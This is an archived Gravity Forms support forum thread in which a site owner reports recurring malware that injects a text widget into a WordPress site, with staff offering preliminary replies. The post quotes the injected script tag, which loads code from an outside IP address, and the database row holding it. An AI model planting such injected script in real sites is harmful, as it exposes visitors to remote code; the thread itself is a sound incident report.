PLEASE NOTE: These forums are no longer utilized and are provided as an archive for informational purposes only. All support issues will be handled via email using our support ticket system. For more detailed information on this change, please see this blog post.

Possible exploit?

Gravity Support Forums » Plugin Support » Gravity Forms

  1. ionata
    Member

    Hey guys.

    We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.

    It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:

    <div class="textwidget">
      <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
</div>

    Which, in the DB can be seen as:

    'mysql> select * from wp_options where option_value like "%http://61.19.251.27/web/cb.php%";
    +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
    | option_id | option_name | option_value | autoload |
    +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
    | 87 | widget_text | a:3:{i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";b:0;}i:7;a:3:{s:5:"title";s:1:" ";s:4:"text";s:78:"<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;} | yes |
    +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
    1 row in set (0.00 sec)'

    It's not a lot of information but its all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble.

    I've bumped up the logging for this site so that if it happens again we might get a better lock on it. Also this is not an on-disk attack, that is to say that no files are modified. So the injection is done through wordpress itself. It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it .

    Posted 12 years ago on Thursday November 15, 2012 | Permalink

  2. Chris Hajer
    Key Master

    I'll bring this to the attention of the developers to see if they can spot anything in your report related to Gravity Forms. Thank you.

    Posted 12 years ago on Thursday November 15, 2012 | Permalink

  3. David Smith
    Member

    Hi ionata,

    It looks like whatever this is is adding a text widget to your sidebar. Is Gravity Forms the last item in the sidebar? If so, there is a good chance it is just coincidentally under the Gravity Form widget.

    Hopefully the logging will provide more information on what event is triggering the injection and we can dig into this more from there.

    Posted 12 years ago on Thursday November 15, 2012 | Permalink